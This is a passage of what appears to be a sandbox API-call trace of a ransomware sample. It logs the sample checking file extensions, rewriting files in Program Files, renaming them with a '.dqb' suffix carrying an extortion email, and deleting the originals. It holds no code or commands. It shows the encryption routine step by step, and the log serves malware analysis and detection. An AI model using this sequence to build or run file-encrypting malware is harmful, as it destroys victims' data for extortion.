maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.937] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0274.485] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.485] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0274.538] GetLastError () returned 0x0 [0274.538] ReadFile (in: hFile=0x31c, lpBuffer=0x38f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fed4, lpOverlapped=0x0 | out: lpBuffer=0x38f0020*, lpNumberOfBytesRead=0x2d4fed4*=0x5a8, lpOverlapped=0x0) returned 1 [0274.541] WriteFile (in: hFile=0x2d4, lpBuffer=0x38f0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2d4fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38f0020*, lpNumberOfBytesWritten=0x2d4fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0274.542] ReadFile (in: hFile=0x31c, lpBuffer=0x38f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fed4, lpOverlapped=0x0 | out: lpBuffer=0x38f0020*, lpNumberOfBytesRead=0x2d4fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.542] WriteFile (in: hFile=0x2d4, lpBuffer=0x38f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38f0020*, lpNumberOfBytesWritten=0x2d4fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.542] SetEndOfFile (hFile=0x2d4) returned 1 [0274.542] CloseHandle (hObject=0x2d4) returned 1 [0274.542] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.542] SetEndOfFile (hFile=0x31c) returned 1 [0274.547] CloseHandle (hObject=0x31c) returned 1 [0274.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.564] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf")) returned 1 [0274.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.565] lstrlenW (lpString=".doc") returned 4 [0274.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.565] lstrlenW (lpString=".docx") returned 5 [0274.565] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.565] lstrlenW (lpString=".pdf") returned 4 [0274.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.565] lstrlenW (lpString=".xls") returned 4 [0274.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.565] lstrlenW (lpString=".xlsx") returned 5 [0274.565] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.565] lstrlenW (lpString=".ppt") returned 4 [0274.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.565] lstrlenW (lpString=".zip") returned 4 [0274.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.565] lstrlenW (lpString=".rar") returned 4 [0274.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.565] lstrlenW (lpString=".bz2") returned 4 [0274.565] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.565] lstrlenW (lpString=".7z") returned 3 [0274.565] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.566] lstrlenW (lpString=".dbf") returned 4 [0274.566] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.566] lstrlenW (lpString=".1cd") returned 4 [0274.566] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.566] lstrlenW (lpString=".jpg") returned 4 [0274.566] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.566] lstrlenW (lpString=".doc") returned 4 [0274.566] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.566] lstrlenW (lpString=".docx") returned 5 [0274.566] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.566] lstrlenW (lpString=".pdf") returned 4 [0274.566] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.566] lstrlenW (lpString=".xls") returned 4 [0274.566] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.566] lstrlenW (lpString=".xlsx") returned 5 [0274.566] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.566] lstrlenW (lpString=".ppt") returned 4 [0274.566] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.566] lstrlenW (lpString=".zip") returned 4 [0274.566] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.566] lstrlenW (lpString=".rar") returned 4 [0274.566] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.566] lstrlenW (lpString=".bz2") returned 4 [0274.566] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.567] lstrlenW (lpString=".7z") returned 3 [0274.567] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.567] lstrlenW (lpString=".dbf") returned 4 [0274.567] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.567] lstrlenW (lpString=".1cd") returned 4 [0274.567] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 63 [0274.567] lstrlenW (lpString=".jpg") returned 4 [0274.567] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.567] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.567] lstrlenW (lpString="EN00006_.WMF") returned 12 [0274.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.950] GetFileSizeEx (in: hFile=0x1d4, lpFileSize=0x2d4ff1c | out: lpFileSize=0x2d4ff1c*=13936) returned 1 [0274.950] CloseHandle (hObject=0x1d4) returned 1 [0274.950] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf")) returned 0x20 [0274.950] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.951] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.951] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00006_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 95 os_tid = 0x668 [0268.601] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x6c2d68 [0268.601] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3a00048 [0268.602] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634f58 [0268.602] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6619f0 [0268.602] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634f70 [0268.602] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x3b00020 [0268.602] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634f88 [0268.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634f88, Size=0x20) returned 0x65b800 [0268.602] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634f88 [0268.602] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634f88, Size=0x20) returned 0x65b828 [0268.602] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.602] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.602] Wow64DisableWow64FsRedirection (in: OldValue=0x2e8ff58 | out: OldValue=0x2e8ff58*=0x0) returned 1 [0268.603] lstrlenW (lpString="kernel32.dll") returned 12 [0268.603] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b800 | out: hHeap=0x5e0000) returned 1 [0268.603] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.603] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b828 | out: hHeap=0x5e0000) returned 1 [0268.603] Sleep (dwMilliseconds=0x64) [0268.984] Sleep (dwMilliseconds=0x64) [0269.252] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0269.252] lstrlenW (lpString="Content.xml") returned 11 [0269.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0269.411] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=27045) returned 1 [0269.411] CloseHandle (hObject=0x1f8) returned 1 [0269.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0269.411] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.411] lstrlenW (lpString=".doc") returned 4 [0269.411] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0269.411] lstrlenW (lpString=".docx") returned 5 [0269.411] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0269.411] lstrlenW (lpString=".pdf") returned 4 [0269.411] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0269.411] lstrlenW (lpString=".xls") returned 4 [0269.412] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString=".xlsx") returned 5 [0269.412] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0269.412] lstrlenW (lpString=".ppt") returned 4 [0269.412] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.412] lstrlenW (lpString=".zip") returned 4 [0269.412] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0269.412] lstrlenW (lpString=".rar") returned 4 [0269.412] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString=".bz2") returned 4 [0269.412] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString=".7z") returned 3 [0269.412] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0269.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.412] lstrlenW (lpString=".dbf") returned 4 [0269.412] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.412] lstrlenW (lpString=".1cd") returned 4 [0269.412] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.412] lstrlenW (lpString=".jpg") returned 4 [0269.412] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.412] lstrlenW (lpString=".doc") returned 4 [0269.412] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString=".docx") returned 5 [0269.412] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0269.412] lstrlenW (lpString=".pdf") returned 4 [0269.412] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0269.412] lstrlenW (lpString=".xls") returned 4 [0269.413] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0269.413] lstrlenW (lpString=".xlsx") returned 5 [0269.413] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0269.413] lstrlenW (lpString=".ppt") returned 4 [0269.413] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0269.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.413] lstrlenW (lpString=".zip") returned 4 [0269.413] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0269.413] lstrlenW (lpString=".rar") returned 4 [0269.413] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0269.413] lstrlenW (lpString=".bz2") returned 4 [0269.413] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0269.413] lstrlenW (lpString=".7z") returned 3 [0269.413] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0269.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.413] lstrlenW (lpString=".dbf") returned 4 [0269.413] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0269.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.413] lstrlenW (lpString=".1cd") returned 4 [0269.413] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0269.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0269.413] lstrlenW (lpString=".jpg") returned 4 [0269.413] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0269.413] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.413] lstrlenW (lpString="boxed-split.avi") returned 15 [0269.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.438] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=62976) returned 1 [0269.438] CloseHandle (hObject=0x1f4) returned 1 [0269.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0269.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.438] lstrlenW (lpString=".doc") returned 4 [0269.438] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.438] lstrlenW (lpString=".docx") returned 5 [0269.438] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0269.438] lstrlenW (lpString=".pdf") returned 4 [0269.439] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString=".xls") returned 4 [0269.439] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString=".xlsx") returned 5 [0269.439] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0269.439] lstrlenW (lpString=".ppt") returned 4 [0269.439] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.439] lstrlenW (lpString=".zip") returned 4 [0269.439] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString=".rar") returned 4 [0269.439] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString=".bz2") returned 4 [0269.439] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString=".7z") returned 3 [0269.439] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.439] lstrlenW (lpString=".dbf") returned 4 [0269.439] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.439] lstrlenW (lpString=".1cd") returned 4 [0269.439] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.439] lstrlenW (lpString=".jpg") returned 4 [0269.439] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.439] lstrlenW (lpString=".doc") returned 4 [0269.439] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString=".docx") returned 5 [0269.439] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0269.439] lstrlenW (lpString=".pdf") returned 4 [0269.439] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.439] lstrlenW (lpString=".xls") returned 4 [0269.440] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.440] lstrlenW (lpString=".xlsx") returned 5 [0269.440] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0269.440] lstrlenW (lpString=".ppt") returned 4 [0269.440] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.440] lstrlenW (lpString=".zip") returned 4 [0269.440] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.440] lstrlenW (lpString=".rar") returned 4 [0269.440] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.440] lstrlenW (lpString=".bz2") returned 4 [0269.440] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.440] lstrlenW (lpString=".7z") returned 3 [0269.440] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.440] lstrlenW (lpString=".dbf") returned 4 [0269.440] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.440] lstrlenW (lpString=".1cd") returned 4 [0269.440] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0269.440] lstrlenW (lpString=".jpg") returned 4 [0269.440] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.440] Sleep (dwMilliseconds=0x64) [0269.827] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0269.827] lstrlenW (lpString="baseAltGr_rtl.xml") returned 17 [0269.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0270.488] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=247) returned 1 [0270.488] CloseHandle (hObject=0x318) returned 1 [0270.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml")) returned 0x20 [0270.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.489] lstrlenW (lpString=".doc") returned 4 [0270.489] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString=".docx") returned 5 [0270.489] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0270.489] lstrlenW (lpString=".pdf") returned 4 [0270.489] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString=".xls") returned 4 [0270.489] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString=".xlsx") returned 5 [0270.489] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0270.489] lstrlenW (lpString=".ppt") returned 4 [0270.489] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0270.489] lstrlenW (lpString=".zip") returned 4 [0270.489] lstrcmpiW (lpString1=".zip", 